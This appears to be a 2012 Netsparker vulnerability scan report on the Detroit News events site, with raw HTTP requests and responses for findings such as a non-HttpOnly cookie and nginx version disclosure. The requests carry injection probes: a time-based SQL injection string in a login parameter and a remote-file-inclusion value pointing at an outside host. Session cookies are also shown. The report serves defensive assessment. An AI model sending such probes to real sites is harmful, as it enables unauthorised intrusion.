Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDmxhc3Rfd2hhdCIGMyIIcmlkaRkiC2J1Y2tldEYiDmxhc3Rfd2hlbiIiaHR0cDovL25ldHNwYXJrZXIuY29tL24%2FAC5waHAiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESIJY2l0eSIfUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAiC3JhZGl1c2lQIg1sYXRpdHVkZWYaNDIuNDkyMjk0NjAwMDAwMDAxAH%2BrIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhNkaXNwbGF5X3N0cmluZyIjUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAsIE1JIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy04My4xMzI3MzMyMDAwMDAwMDQARfsiEXdoZXJlX3N0cmluZ0AcIgxhZGRyZXNzIgo0ODA2NyIKc3RhdGUiB01J--94426f4eb621b496a687bcddaea3d6de896cbd56; path=/; expires=Sat, 14-Apr-2012 13:52:27 GMT; HttpOnly
Content-Encoding:
Transfer-Encoding: chunked


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Error - Detroit News</title> <script type="text/javascript"> var zlogid = "I66CZzLuiXb5sjHxtNexaQ"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = ''; var z_temp_type = ''; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_new = 'n';var z_swhat = '3';var z_has_editors_pick = '1';var z_srad = '40';var z_swhen = 'http://netsparker.com/n? .php';var z_swhere = '';var z_action = 'index';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.606147970006598" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"I66CZzLuiXb5sjHxtNexaQ","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop48="art_DET"s_zv.prop49="art_ZEN"s_zv.pageType="errorPageSysError" s_zv.pageName="System Error" s_zv.channel="" s_zv.hier1="" s_zv.prop12="" s_zv.prop25="/search?has_editors_pick=1&amp;new=n&amp;srad=40&amp;swhat=3&amp;swhen=http://netsparker.com/n?%00.php" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|System Error" s_zv.server="www21.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&amp;lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">

<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>

<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>

<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>

<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>

!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script&gt;
<!-- End OAS Ad Code -->

<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>

</head>

<body class="ody-skin">

<div class="ody-custom interactive">
<div class="ody-custom-wrapper">

<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>

<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">

<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="3" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="http://netsparker.com/n? .php" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Royal Oak Charter Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City &amp; State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.606147970006598" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&amp;lid=Header_NavBar_&amp;lpos=_">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&amp;lid=Header_NavBar_&amp;lpos=_">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&amp;lid=Header_NavBar_&amp;lpos=_">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&amp;lid=Header_NavBar_&amp;lpos=_">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fhas_editors_pick%3D1%26new%3Dn%26srad%3D40%26swhat%3D3%26swhen%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%2500.php">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fhas_editors_pick%3D1%26new%3Dn%26srad%3D40%26swhat%3D3%26swhen%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%2500.php">Log In</a></div><div id="content"><div style="width:550px;margin:0 auto;"><h2>You have encountered an error.</h2><p> We apologize for the inconvenience. Details of this issue have been emailed to technical support.</p><p> If you need immediate assistance or would like to contact technical support directly, please <a href="/support/contact">contact us here</a>.</p></div><div class="divclear"></div></div><div class="divclear"></div></div>
</div><!-- Closing .article -->
</div><!-- Closing .container -->
</div><!-- Closing .content-container -->
</div><!-- Closing .ody-wrapper -->

<!--<script type="text/javascript" src="http://detroitnews.com/portables/insidetdn.js"></script>-->

<script type="text/javascript" src="http://detroitnews.com/portables/footer.js"></script>

</div><!-- Closing .ody-custom-wrapper -->
</div><!-- Closing .ody-custom -->

<!--
<script type="text/javascript" language="JavaScript">
s.pageName="events.detnews.com|Zvents|" + TDN_pageType + "|" + z_temp_type + "|" + document.title;
s.server=""; // Do Not Alter
s.channel="";
s.pageType="";
s.pageValue="";
s.prop1 = "Entertainment";
s.prop2 = "Entertainment_Events";
s.prop3 = "";
s.prop4 = "";
s.prop5 = "";
s.prop6 = "entertainment_tourism";
s.prop7 = "entertainment";
s.prop16 = "";
s.prop25="Detroit:detnews";
s.prop50="Newspaper";
</script>
<script type="text/javascript" src="http://detroitnews.com/portables/site_catalyst.js"></script> --> <div id="zpwrdby"> <a href="http://www.zvents.com/z48067"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" /></a> </div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-31999-22";urchinTracker();</script><!-- Start Quantcast tag --><script type="text/javascript">_qoptions={qacct:"p-54UqpxMM201CU"};</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script><noscript><img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript><!-- End Quantcast tag --><img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" /><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery(document).append('<div style="display:none"><img width="1px" height="1px" src="http://js2.zvents.com/images/js2_test.gif" /></div>'); });</script></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /user/login

/user/login CONFIRMED

http://events.detnews.com/user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
return_to GET 1;WAITFOR DELAY '0:0:25'--

Identified Cookie

welcome

Request

GET /user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 302 Found
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
Location: https://secure.zvents.com/elx/events_detnews_com/user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27--&elxt=83fa1cfea3e7eb599804716f580e67bb::8a93353a68bbd62e394044e2ccec2e0a
X-Runtime: 11
Z-DETECTED-FLAVOR: events_flavor |
Cache-Control: no-cache
Z-REQUEST-HANDLED-BY: www17
Set-Cookie: welcome=jBhyRcrOZRAYx83quTJTsw.130338087; path=/; expires=Tue, 14-Jan-2042 13:51:45 GMT,zvents_tracker_sid=jBhyRcrOZRAYx83quTJTsw.130338087; path=/; expires=Tue, 14-Jan-2042 13:51:45 GMT,_zsess=BAh7BzoPc2Vzc2lvbl9pZCIlZjlmZjI2ODg0NjAyYmVmOGJmNjY4ODU2ZmQ1OGU4ZDIiDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--fc8019d92289bab22905e41db8a269fe20b6e5fd; path=/; expires=Sat, 14-Apr-2012 13:51:46 GMT; HttpOnly


<html><body>You are being <a href="https://secure.zvents.com/elx/events_detnews_com/user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27--&amp;elxt=83fa1cfea3e7eb599804716f580e67bb::8a93353a68bbd62e394044e2ccec2e0a">redirected</a>.</body></html>
Nginx Server Version Disclosure

Nginx Server Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Nginx. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Add the following line to your nginx.conf file to prevent information leakage from the SERVER header of its HTTP response.
	server_tokens off

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /sitemap.xml

/sitemap.xml

http://events.detnews.com/sitemap.xml

Extracted Version

0.6.39

Request

GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiC3JhZGl1c2ktIgljaXR5Igo0ODA2NyIKZXJyb3JGIg1sYXRpdHVkZWYPNDIuNDkyMwDpECINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciCjQ4MDY3IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--b2c99bac14f9b2252a0baa7f0d06fedecd1c46c7; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:36 GMT
Content-Type: text/xml
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 19
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="sitemap.xml"
Cache-Control: private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; path=/; expires=Sat, 14-Apr-2012 13:51:36 GMT; HttpOnly
Content-Encoding:


<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://events.detnews.com/sitemapevent26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapvenue26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapkeyword26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapcategory26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaprestaurant26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaptheater26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapmovie26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap></sitemapindex>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /opensearch/description26.xml

/opensearch/description26.xml

http://events.detnews.com/opensearch/description26.xml

Found E-mails

support@zvents.com

Request

GET /opensearch/description26.xml HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:37 GMT
Content-Type: text/xml
Last-Modified: Sat, 14 Jan 2012 08:07:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sun, 15 Jan 2012 13:51:37 GMT
Cache-Control: max-age=86400
Content-Encoding:


<?xml version="1.0" encoding="UTF-8"?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"><ShortName>Zvents: Discover Things To Do</ShortName><Description>Use to discover things to do.</Description><Tags>local events venues restaurants movies performers</Tags><Contact>support@zvents.com</Contact><Url type="application/rss+xml" xmlns:zvents="http://events.detnews.com/opensearchextensions/1.0/" template="http://events.detnews.com/search?swhat={searchTerms}&amp;swhen={zvents:when?}&amp;swhere={zvents:where?}&amp;srad={radius?}&amp;ssi={startIndex?}&amp;srss={itemsPerPage?}&amp;format=opensearch" /><Url type="text/html" xmlns:zvents="http://events.detnews.com/opensearchextensions/1.0/" template="http://events.detnews.com/search?swhat={searchTerms}&amp;ssi={startIndex?}&amp;srss={itemsPerPage?}" /><LongName>: Discover Things To Do</LongName><Image type="image/gif">http://events.detnews.com/images/zvents_opensearch.gif</Image><Query role="example" searchTerms="dance" /><Attribution> Event search data &amp;copy; 2006, Zvents.com, Inc., All Rights Reserved</Attribution></OpenSearchDescription>
Sitemap Identified

Sitemap Identified

1 TOTAL
INFORMATION
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information, there is no direct impact resulting from this.
- /sitemap.xml

/sitemap.xml

http://events.detnews.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiC3JhZGl1c2ktIgljaXR5Igo0ODA2NyIKZXJyb3JGIg1sYXRpdHVkZWYPNDIuNDkyMwDpECINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciCjQ4MDY3IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--b2c99bac14f9b2252a0baa7f0d06fedecd1c46c7; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:36 GMT
Content-Type: text/xml
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 19
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="sitemap.xml"
Cache-Control: private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; path=/; expires=Sat, 14-Apr-2012 13:51:36 GMT; HttpOnly
Content-Encoding:


<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://events.detnews.com/sitemapevent26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapvenue26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapkeyword26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapcategory26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaprestaurant26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaptheater26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapmovie26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap></sitemapindex>